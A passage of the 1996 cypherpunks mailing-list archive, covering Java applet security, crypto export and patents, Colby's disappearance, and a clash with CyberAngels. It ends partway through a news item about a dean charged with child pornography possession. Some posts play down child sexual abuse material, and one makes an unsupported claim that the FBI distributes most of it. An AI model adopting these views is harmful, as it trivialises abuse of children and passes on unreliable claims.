> > Aren't you making an assumption that Colby is dead?  No body has been found
> > last I heard.   Maybe he just decided that he wanted to disappear in a
> > comparatively non-suspicious fashion?
>
> Having met Colby and being somewhat familiar with his political skills I
> would be surprised if he would ever think a drowning accident was
> "non-suspicious."
>
> William Colby, whatever anyone may think of intelligence, was quite a man,
> respected in the community, a major in the OSS and a World War II hero
> decorated 5 times.  His like are not common.
>
> I hope he is found alive and well.

Having met Colby, I found him a very remarkable person, and also very pleasant.
Unfortunately, I believe he's dead.  R.I.P.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 1 May 1996 16:19:32 +0800
To: cypherpunks@toad.com
Subject: [RANT] Mr. Scruffy versus Mr. Neat
Message-ID: <199605010408.VAA23530@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU> writes:

 > One interesting phenomenon is the in-migration of neats
 > into formerly scruffy-only domains. For instance, take a
 > look at the third, fourth, and fifth international
 > conference proceedings on genetic algorithms. You've got
 > scruffies who are just doing what feels right and seeing if
 > it works (my viewpoint) and mathematicians/neats who are
 > trying to derive what _should_ work the best.

The scruffy/neat competition has been around for a long time in
the hard sciences as well.  Good examples are the competing
notions used by mathematicians and physicists for doing
differential geometry, calculus of variations, and field theory,
and the physicists who think physicists can do chemistry better
than chemists can.

Ultimately, there tends to be a merger of notations and
approaches. The big Misner, Wheeler, Thorne book on Gravitation,
for instance, presented everything both from the view of the
physicists, who like to write everything as algebraic equations
in terms of components of geometric objects with respect to a
basis, and the view of mathematicians, who like abstract maps
between abstract geometric objects, and terms like tangent
spaces, exterior products, and germs.

Usually the scruffies get great results using formal manipulation
that horifies the neats, and then the neats come in and do the
rigorous proofs that demonstrate that everything the scruffies
did was valid.

This was certainly the case in quantum mechanics as well, where
questionable formal manipulation got the right answers for many
years before a rigorous theory of unbounded linear
transformations on Hilbert spaces was developed.  Indeed,
physicists happily computed commutators and anti-commutators of
such operators blithely unaware of their domains and ranges long
before the equivalent definitions in terms of one parameter Lie
groups or projection valued measures were known.

While Java is currently a scruffy invention and has yet to
recieve the official blessing of the neats, there are a number of
things that speak in its favor.

First, object-oriented runtime structures such as those used by
Java have pretty much been researched to death in various other
venues, such as APL, APL2, Smalltalk, and the MIT Lisp Machine
project.  It is not likely that we will discover some previously
unknown mode of corruption in such systems, and defensively
coding interpreters for these kinds of languages and verifying
them to prove that they contain no errors which could result in
the violation of container boundaries is a well-developed art.

This doesn't mean that such systems are free of bugs, of course,
but it does mean that they are free of the type of really cute
bugs that allow users to trick the machine into executing
arbitrary machine instructions, or into making disingenuous
requests to the kernel.

Second, there is quite a bit of experience on the part of OS
designers in meeting various levels of MIL Specs for security,
and with the standard techniques, such as audit trails,
authentication, and ACLs, which are commonly employed to
implement the features required.

So although the neats have not yet given Java their blessing, it
is extremely unlikely we won't manage to create an environment
which can safely run untrusted Java code, and filter the
program's requests for system services in a way which will block
and log any attempts to do nasty things, both for the Applet
model, and for more general applications.

A prior poster suggested that in the absence of formal proofs of
correctness, flaws permitting the exploitation of covert channels
and other such things in a language such as Java were "a
certainty." I think the situation is more complicated than this
suggests, and while I probably wouldn't want an artificial heart
with Java software today, I think a lot of the worries will
resolve themselves as time passes, and the things we are
all discussing are implemented.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Martin <jhmartin@kent.wednet.edu>
Date: Wed, 1 May 1996 16:29:03 +0800
To: cypherpunks@toad.com
Subject: Re: Calling other code in Java applications and applets
Message-ID: <2.2.32.19960501042008.006aaac4@mailhost.kent.wednet.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:12 AM 4/30/96 -0500, you wrote:
>I (and some others, I think) was hoping that it would be possible to build
>powerful crypto applets and put them up on web pages.  That way everyone 
>with a java enabled copy of Netscape could use a remailer or send crypted 
>mail without having to download, install, and configure software.

What with the concern of hacked or modified clients, I would think that
trusting a java applet someone put on their page would be rather difficult.
How could the user know that you weren't really sending their cleartext back
to you?

>If people have to download and install a plugin to use a java mixmaster
>applet, why not just download and install a native mixmaster client?

I have not seen a mixmaster client for the PC/Win95 yet.  Did I just miss it? 

>Of course there are other reasons to use java -- platform independence,
>for example. 

Remember that we can't really know if their applet is secure or just a
trojan horse.  
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYbXgA4CsinapZ9dAQFyzwQAkMX2YOYQ9llJse1CIbhFsUnxYij/5Ny0
H8aqs4jsVjBpcGoER4vHCNnjaFHJPelaN4LArLFvjmWsgOo4yF2MIJyp4AHe+jU3
BhqsTCf6XfG1ydzCF/jFDUc/PHg7cA/gtZS5NnQiIy4ZYok4/x7+zJQCZaS8DZqq
/vp2WLw933o=
=vdz3
-----END PGP SIGNATURE-----
+-------------------------------------------------------+
|If the above is not PGP signed, I MAY not have sent it.|
|jhmartin@kent.wednet.edu * Key available via server    |
|    KR Annual Staff      | PGP 'crypted mail preferred.|
+-------------------------^-----------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 1 May 1996 15:09:52 +0800
To: tcmay@got.net
Subject: Re: "Scruffies" vs. "Neats"
Message-ID: <01I460YIKXG08Y50HU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 30-APR-1996 19:30:55.47

>More recently, the scruffies have embraced neural nets, emergent
>computation, stochastic computing, genetic algorithms, and similar
>buzzwords. The recent work on "subsumption architectures" (a la Brooks) and
>agent architectures is consistent with viewpoint (though elements of logic
>are of course involved).

	One interesting phenomenon is the in-migration of neats into formerly
scruffy-only domains. For instance, take a look at the third, fourth, and fifth
international conference proceedings on genetic algorithms. You've got
scruffies who are just doing what feels right and seeing if it works (my
viewpoint) and mathematicians/neats who are trying to derive what _should_
work the best. (Of course, there is the problem with the neat approach that
it tends to oversimplify. For instance, many neat-variety equations for
genetic algorithms, such as the original version of the Schema Theorem, don't
take into account differing types of mutations - from a "don't care" symbol
to a 0 or 1 is less of a change from a 0 to a 1.)
	I will be interested in seeing the more final version of this essay.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 1 May 1996 15:24:31 +0800
To: shamrock@netcom.com
Subject: Re: Calling other code in Java applications and applets
Message-ID: <01I4621DGYDY8Y50HU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"shamrock@netcom.com" 30-APR-1996 08:43:38.24

>Presumably, such packages would have to be signed by Sun. Needless to say,
>these certificates would cost money. A potentially lucrative source of
>revenue for Sun. Nothing wrong with that.

	Nothing wrong with that, no... as long as Sun isn't (as TCMay
speculated indirectly) pressured into not signing such packages if they were
crypto-usable. Does Sun currently do much business with the US Government,
particularly sections (e.g., the military, law enforcement and intelligence
ones) susceptible to being influenced by the NSA?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 1 May 1996 17:12:30 +0800
To: Jonathon Blake <grafolog@netcom.com>
Subject: Re: Former CIA Director and *Strategic Investment* Editor
Message-ID: <m0uEU0J-00095cC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:06 AM 5/1/96 +0000, Jonathon Blake wrote:

>> known to be so!) that his neighbor would call the cops just because he, 
>> ONCE, stayed a little longer than normal?
>
>	I guess you've never had the pleasure of living in a small town.
>	If you had, you'd know just how observant people are, of others
>	habits.  

However, you haven't explained why mere "observance" would translate into a 
call to the cops (if that's what happened; according to the reports it did) 
under those circumstances.  I can observe a lot that doesn't necessarily 
induce me to drag the cops into it.

Initially, I was thinking that perhaps the neighbors might have become 
suspicious, walked over and saw a capsized canoe.  However, according to 
another item the canoe was over 400 yards from the house, which is 
sufficiently far to make it difficult to see along many shorelines.  Do you 
have an alternative explanation?

>> What's wrong with this picture?
>
>	You ability to see conspiracy where there may be non.
	
It's odd.  You're the third person to use the term "conspiracy" when I 
haven't mentioned the word.  Somehow, I think that you guys must be misusing 
the term "conspiracy" when what you really mean is something else.  Why not 
pick up an OED, an choose a better word.

Jim Bell
jimbell@pacifier.com
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 1 May 1996 17:07:26 +0800
To: perry@piermont.com
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
Message-ID: <199605010521.WAA02990@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Perry E. Metzger" <perry@piermont.com>
> 
> The Web is the universal marketplace these days. Being unable to use
> the web is the equivalent of being unable to use the phone. I have
> research analysts at large trading houses begging for
> Netscape. Unfortunately, these people have a need for top notch
> security, because vast amounts of money are at stake.
>  [...]
> Unfortunately, when the same machine runs Netscape so the
> trader can read the UUNet/MFS merger press release and also has the
> big shiny red "trade!" button on some application, you get nervous.

Aren't you holding Java to a higher standard than ordinary applications?
If your traders run any software at all on their machines there is the
risk of harm.  The Netscape binary itself could be hacked to do bad
things.  Likewise with any other software they run.

Wouldn't it be safer to run a Java applet than a typical program from the
net?  At least applets run in an environment which is designed to
restrict the harm they can do.  In OS's like Windows 95 there are no
such restrictions on programs.

Take a specific example: Mixmaster.  This is a client for the remailer
network.  It is reasonably well suited to being implemented as a Java
applet given the current restrictions on the language.  If you had a
choice between downloading and running the client as a program on your
PC, versus loading and running it as an applet, which would you prefer?

Or if you would do neither, how would you go about acquiring this
functionality?  Would you forego it forever, or would there come a time,
say if no one else reported problems, that you would be willing to run
one or the other?

What I am really trying to get at is how you balance the risks that
come automatically when you interact with the net against the benefits
you get by doing so.  You have chosen a certain point on the
risk-reward continuum, one for which Java applets are apparently on the
too-risky side.  So I am wondering what principles you use to decide
where a proposed application falls.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 1 May 1996 17:29:01 +0800
To: cypherpunks@toad.com
Subject: Lolitas and Cyber Angels
Message-ID: <199605010543.WAA01100@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


(CyberAngels Director : Colin Gabriel Hatcher) writes:

 > Child pornographers encrypt their hard drives so that law
 > enforcement cannot gather crime evidence - that is certainly
 > a state of greater security for the pornographer, but it
 > does not improve our Community, and as child pornography
 > increases, the law is by definition broken more and more,
 > and so the Community becomes less free than before.

This is silly on several levels.  First, given that a finite
amount of resources are available to combat the sexual
exploitation of children, law enforcement should concentrate
their resources on the production of such material, and not on
the incidental evidence of its production long after the fact,
and in a context completely unrelated to any economic link back
to the original producers.

Someone who has an encrypted file on their hard drive from some
motheaten child porn magazine published 20 years ago is no more
guilty of the exploitation of the models portrayed than someone
who downloads the Simpson crime scene photos from
alt.binaries.pictures.tasteless is guilty of killing Nicole and
Ron.  If anything, such a picture is little more than historical
documentation of a bygone era and an expensive distraction for
police officers who might better spend their time. 

Indeed, if encryption inhibits the ability of the government to
create exceptions, based solely on irrational public hysteria, to
the First Ammendment right of citizens to communicate amongst
themselves on any subject, including via the use of visual
material, then encryption is serving a valuable purpose.

Now before anyone accuses me of advocating a thriving market in
child porn, let me say that I have no objection at all to laws
which set a minimum age for working as a performer in the sex
industry, and to enthusiastic prosecution of individuals who
violate those laws.

I just think the police should concentrate their resources on
real children experiencing real abuse, and leave their prurient
interest in the contents of libraries and other peoples computers
behind when they go to work.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 1 May 1996 17:05:42 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Freedom and security
In-Reply-To: <199604301630.MAA14089@jekyll.piermont.com>
Message-ID: <Pine.LNX.3.91.960430222709.108B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Apr 1996, Perry E. Metzger wrote:
> CyberAngels Director : Colin Gabriel Hatcher writes:
> > If they were antithetical then as freedom increased security would
> > freedom.  My concern is that if we ignore security we will have no freedom
> > left to protect.
> > at different points.  I don't believe that security is the enemy of
> > freedom.  I believe that freedom needs security in order to exist at all.
> You will pardon my asking this, but, security from what? Who are the
> evil Network Terrorists throwing Bit Bombs or whatever? The only
> security you need on the internet is keeping your site from being
> broken in to, which is mostly a matter of setting it up
> properly. What, exactly, is the "Security" that you are offering us?

	Let me grab my other .sig here:

Postmodernism is the refusal to think--Ron Carrier            petro@suba.com 
Deconstruction is the refusal to believe that anyone else can either
Freedom of choice is what you have, freedom from choice is what you want.
	-- DEVO

	The last line is the relevant portion here. Just as there is 
freedom to, there is freedom _from_. I think that the same thing could be 
said for Security. On one hand you have the security to leave your house, 
safe in the knowlege that the majority of your stuff will be there when 
you return, and the security to walk the streets without the fear of 
getting attacked. On the other hand some would have the security of 
knowing that _no one_ is downloading dirty pictures, the security that 
the "wrong" person is not getting their hands on dangerous information 
etc. 
	With freedom, as we all learned in philosophy 101 (wether in 
college or just life) there is freedom TO--such as freedom to move to 
another country, the freedom to exchange ideas without constraint, in 
other words the freedom to do things--and the freedom FROM--from hunger, 
from fear, freedom from failure, freedom from being challenged, freedom 
from choice.

	People like the CyberAngels, are definately (IMO) on the side of 
the freedom FROM, rather than freedom TO, and their security is the the 
enoforced security of a prison, or a police state. 

	True Security, like freedom cannot be enforced or given from 
without, it must come from within. With freedom this is self-explanatory, 
no one can set you free, you have to do it.
	
	Security is the same way. One must be secure in ones beliefs, or 
one will be constantly troubled by "threats" to those beliefs. Witness 
the "Christian Right" in this country. Physcial security works the same 
way. If one takes care of ones community, working with ones neighbors 
etc., and applying social pressure to those who potentially threaten your 
physcial security you will live in a much healthier, and less dangerous 
enviroment (yeah, this is a little simplestic but you get the idea).


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 May 1996 16:18:02 +0800
To: angels@wavenet.com (CyberAngels Director : Colin Gabriel Hatcher)
Subject: Re: Freedom and security
In-Reply-To: <v01510102a9e6b9e2e417@[198.147.118.163]>
Message-ID: <199605010250.WAA15372@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



CyberAngels Director : Colin Gabriel Hatcher writes:
> >You will pardon my asking this, but, security from what? Who are the
> >evil Network Terrorists throwing Bit Bombs or whatever? The only
> >security you need on the internet is keeping your site from being
> >broken in to, which is mostly a matter of setting it up
> >properly. What, exactly, is the "Security" that you are offering us?
> 
> I am not offering "you" anything unless you have a problem and are looking
> for some assistance.  Just because you feel safe / immune from becoming a
> victim of internet crime does not mean that there are no victims at all.
> 
> Site security is not at all the only problem.  Are you not aware of spams
> and scams going on all the time?  Are you not aware that sexual predators
> operate in IRC?

I was under the impression that sex involved physical presense. Are
you telling me that there are people out there somehow getting the
inanimate computers of people on the other side of the net to reach
out and rape the people sitting in front of them?

> Or that child pornography is a world wide trading game?

I must admit to having an odd viewpoint. I don't particularly care
about child pornography. Our nation seems to have an obsession with
the notion that somewhere out there someone is looking at a picture of
a naked boy or something. Myself, well, I am far from convinced that
the existance of child pornography is nearly as much of a threat to me
as the people who want to dismantle all our freedoms in order to stop
it. Most of the child pornography in the U.S. is distributed by the
FBI during stings, you know.

> Have you never heard of email forgeries or impersonation?

Yes. I also happen to have heard that people can impersonate you in
real life, too.

> What about tthe victims of harassment and hatred who don't know how
> to deal with it?  What about all the people who have never heard of
> killfiles?

I suppose they will have to learn, won't they?

You realize that you are being extremely unconvincing?

> Maybe you feel like a veterano and can afford to look condesendingly at all
> the thousands of fresh-faced netizens just arriving online and say "well if
> they can't take the heat they should stay out of the fire" - but if we are
> to call ourselves an emerging "community" then we must take responsibility
> for our city, and that means caring about other people's problems.

And thats where CyberAngels, founded by Curtis Sliwa, the man who had
himself attacked to get publicity, comes in?

Feh.

> When your address is forged and you get flamed and bombed, or if you start
> receiving anonymous death threats, your freedom is under threat.  It's not
> enough to say "Well I just turn off my monitor"

I've had my address forged. I've been flamed. I've been
mailbombed. I've been sent anonymous death threats. I must admit that
I largely ignored all these things, and that at no time did I feel my
freedom was being threatened nearly as much by these events as it was
by Senator Exon.

> The Internet is a city - it needs 911 services and it needs Neighborhood
> Watches.

The internet isn't a city. I live in a city -- a real city. I believe
that if I feel that I'm the subject of a serious death threat, there
is an actual 911 on my real life telephone to dial and talk to the
real life police in my real life city. Thanks, but no thanks.

> And neither professional law enforcement nor neighborhood watch
> are by definition a threat to anyone's freedom.

No, but supporting censorship is.

> By asking me the question: "What crime?" you are indicating to me that you
> prefer denial.

Or, perhaps, that I'm not impressed by opportunistic newcomers with
strongly anti-libertarian viewpoints.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 1 May 1996 15:59:48 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Former CIA Director and *Strategic Investment* Editor
In-Reply-To: <m0uERoX-000938C@pacifier.com>
Message-ID: <Pine.SUN.3.93.960430230011.614W-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Apr 1996, jim bell wrote:

> At 06:15 PM 4/30/96 -0400, Black Unicorn wrote:
> >
> >
> >I typoed.
> >
> >Virginia should read "Maryland" in my last post.
> 
> That's okay; it was only a small slip.
> 
> Small.  Maybe the same magnitude as that secretary who said that Vincent 
> Foster's body was first found in "the parking lot" rather than "the park."  
> Right?  (I don't really even care about Vincent Foster, BTW.)

Give me a break.

Take a look at a map.  Cobb island is less than 5 miles from the MD/VA
border down there and in the middle of a complex and broken shoreline on
the Potomac.

Whatever.

> Jim Bell
> jimbell@pacifier.com

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 May 1996 16:08:49 +0800
To: angels@wavenet.com (CyberAngels Director : Colin Gabriel Hatcher)
Subject: Re: Freedom and security
In-Reply-To: <v01510103a9e6ca1eb494@[198.147.118.163]>
Message-ID: <199605010333.XAA15444@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



CyberAngels Director : Colin Gabriel Hatcher writes:
>  Mike McNally wrote
> 
> >What exactly do you consider "security" and "freedom" to mean here?  Whose
> >security?  Whose freedom?
> 
> Every society has a social contract

Could you show me a copy? Everyone keeps telling me about this
contract, but I can't for the life of me remember signing it.

> You may demand the freedom to kill those who disagree with
> you but no community will grant you that freedom.

I see you've never heard of the Argentine armed forces.

> I am not currently aware that either your right to encrypt nor your right
> to use anon remailers is under threat, so why should I do anything?  But
> while encryption and anon remailing protect *you* from certain threats to
> your freedom, they are also being used for example to make the
> international trade in child pornography more effective and less easy to
> prosecute.

You start by talking about the social contract and how no one agrees
that you should be able to kill people, and then you move straight on
to child pornography.

I find that interesting.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 May 1996 15:55:01 +0800
To: peng-chiew low <pclow@pc.jaring.my>
Subject: Re: [Fwd: Cylink can export 128-bit DH?]
In-Reply-To: <3186D86C.49C@pc.jaring.my>
Message-ID: <199605010334.XAA15452@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



peng-chiew low writes:
> I understand that ITAR prohibits the export of strong crypto
> and that is why I was puzzled that Ms Glenda Barnes, the Director
> of Marketing in Cylink, said that Cylink could export the same crypto
> (i.e. DES) that was used in the U.S. to local banks here in Malaysia.

DES isn't particularly impressive. Now, if they could export 3DES...

> She also claimed that Cylink could also export a 128-bit DH key size.
> (is it strong enough in the first place? )

No.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 1 May 1996 18:20:08 +0800
To: mmiller@netcom.com (Mark S. Miller)
Subject: Re: [LONG] Churchill Club: 20th Anniversary PK Crypto
Message-ID: <199605010641.XAA05552@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>   Paul Raines, Project Manager, United States Postal Service described
>   ...  The post office brings four things that private
>   industry can't: ... (2) ... well established reputation, ...
>   (4) it can act as a trusted third party.
>
>Oh.  Well that's good to know.
>
>        --MarkM

I just report them like I hear them.  They are priced higher than Verisign too.

Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 1 May 1996 18:03:17 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: no-cost DH?
Message-ID: <199605010642.XAA05601@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:06 PM 4/30/96 -0700, Wei Dai wrote:
>On Tue, 30 Apr 1996, Bill Frantz wrote:
>
>> Morris (Cylink): Cylink owns the DH patents.  We are opening the
>> technology with no-cost licenses.  Patents should not be used to block
>> the technology. 
>
>Does anyone know more about these no-cost licenses?  I wouldn't mind
>getting free DH a year early...

I was just reporting (I hope correctly).  You will need to contact Cylink
directly.  The person speaking was David Morris, Vice President.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 1 May 1996 18:14:54 +0800
To: cypherpunks@toad.com
Subject: Re: ITARs and the Export of Classes and Methods
Message-ID: <199605010642.XAA05623@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:49 AM 4/30/96 -0700, Timothy C. May wrote:
>An interesting situation for the ITARs, if they try to restrict bignum
>classes, for example. A class-based system, if done correctly (in whatever
>language, e.g., C++ or Java), should have _most_ of the hard crypto work
>already implemented in classes and methods (for bignums, modular
>exponentiation, etc.), with the final crypto program much more easily
>implemented and exported.

Certain languages, e.g. Smalltalk, and I believe lisp and scheme, have
bignums as a built-in type.  (Or more specifically, their integer types are
limited in size only by available memory.)  I believe these languages are
freely exportable.

Your problem stays here in the good ol' USA.  You can't implement RSA
directly in these languages (I assume RSA in perl has the same problem),
because of the patent restrictions.  Yet another reason to buy a T-shirt.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 1 May 1996 18:05:37 +0800
To: cypherpunks@toad.com
Subject: Re: once again
Message-ID: <199605010642.XAA05631@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:02 PM 4/30/96 -0400, Perry E. Metzger wrote:
>I fully understand that Java is a general programming language and can
>do I/O. However, "Safe" Java subsets, like the ones used for writing
>applets or presumably the ones that would be needed for markets in CPU
>cycles, do not do i/o. One could add i/o to the suite, but that would
>be dangerous.

If I were as worried about Java security as Perry is, I would still
consider running Java (or C or C++) programs as part of certain markets in
CPU cycles because I would trust their source.  (IMHO, much better than
trusting every web page I access.)

A single example.  I could see a network-wide factoring attack on the key
NSA uses to GAK the extra bits in Lotus Notes.  Such an effort would run a
single program, which would be available in source.  Depending on the
details, I could either compile the program locally, or down load a signed
copy of the object code/class file.  The same argument applies to rendering
e.g. Toy Story.

This restriction does not provide for CPU cycle markets in arbitrary
programs, but I think that a significant market could still develop under
this limit.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Wed, 24 Apr 1996 07:05:52 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Meta: The Arguing about the Terms of the Wager Continues
Message-ID: <199604241405.HAA09479@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:45 PM 4/23/96 -0700, Timothy C. May wrote:
> And so the back-and-forth continues...taking up even more list space
> arguing, waffling, finessing, rebutting, disputing, and on an on.
>
> Exactly as several of us have predicted.

True, but one should note that it is Jim Bell that is weaseling,
and that Unicorn is not weaseling.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 24 Apr 1996 07:17:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Golden Key Campaign
Message-ID: <199604241415.HAA02557@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I appreciate the temperate responses to my knee-jerk diatribe against
RSA's involvement in the golden key campaign.  The key logo doesn't
actually resemble RSA's very much, although the small versions do seem
similar to the golden keys shown in Netscape's browser.  So far as I know
though Netscape hasn't threatened any lawsuits to make people take crypto
off the net so I don't object to that...

Now that the patent situation with regard to public key encryption has
changed due to the RSA/Cylink split, it appears that the patent which
claims to cover all PK encryption has been seriously weakened.  There are
other PK encryption systems than RSA which are just as good, such as El
Gamal or Rabin encryption.

Rabin encryption would have the advantage that it could be used with
existing RSA keys as long as the modulus is a Blum modulus.  PGP at least
has always used Blum moduli, perhaps for this eventuality.  So an
alternative encryption program could use Rabin encryption and work with
the existing infrastructure of PGP keys.  It would not of course be
compatible with PGP for encryption and decryption.

This doesn't solve the signature problem; I'm not sure if there is a
signature algorithm which could use RSA public keys but which is not
covered by the RSA patent.  In any case since PGP key certificates use
RSA signatures it would not appear to be possible to validate key
signatures without infringing on the RSA patents, so that cancels out a
lot of the advantages of using existing PGP keys.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 24 Apr 1996 05:25:47 -0700 (PDT)
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: EYE_suk
In-Reply-To: <Pine.SOL.3.91.960423221718.19976A-100000@chivalry>
Message-ID: <199604241225.IAA05345@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 
> 
> > 	Isn't the CIA forbidden from doing anything on US soil?
> 
> That'd make cointel a little tricky :-) 
> Simon

Errr,
That is the Feeb's department, & they guard it like the family
jewels.....


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Wed, 24 Apr 1996 08:41:13 -0700 (PDT)
To: jsw@netscape.com
Subject: Re: Golden Key Campaign
In-Reply-To: <317DD5D2.6284@netscape.com>
Message-ID: <199604241540.IAA03214@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>   The key at the bottom of the Netscape window is not the RSA logo, and
> doesn't even look much like it.  Our key is meant to convey the
> absence or presence of encryption via a metaphor that is understandable
> to the average home user, not as an advertisement for RSA.

	The RSA key *does* appear on the flash screen though,
remember.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 24 Apr 1996 09:03:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Childporn found in UCSB Dean's Computer
Message-ID: <199604241601.JAA08886@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


This from my local hometown paper in Santa Barbara.  It illustrates
the use of search rather than subpoena to collect information in
criminal cases, as well as the dangers of having unencrypted 
files lying about:

   UCSB dean faces charge of child porn possession
   by Melissa Grace
   News-Press Staff Writer

   UCSB Dean David M. Kohl, under investigation for misues of universify
   funds, is facing a more embarrassing charge - possession of child
   pornography.

   While searching Koh's home for evidence in the investigation into the
   dean's alleged misuse of about $20,000 in fees charged to students
   applying to medical schools, campus police discovered photographs in
   Koh's computer files depicting minors engaging in or simulating sexual
   conduct.

   The pictures were downloaded by the 52-year-old professor into his
   computer from the Internet.  his lawyer said Kohl was unaware of the
   contents until he opened the unsolicited files, which were sent by an
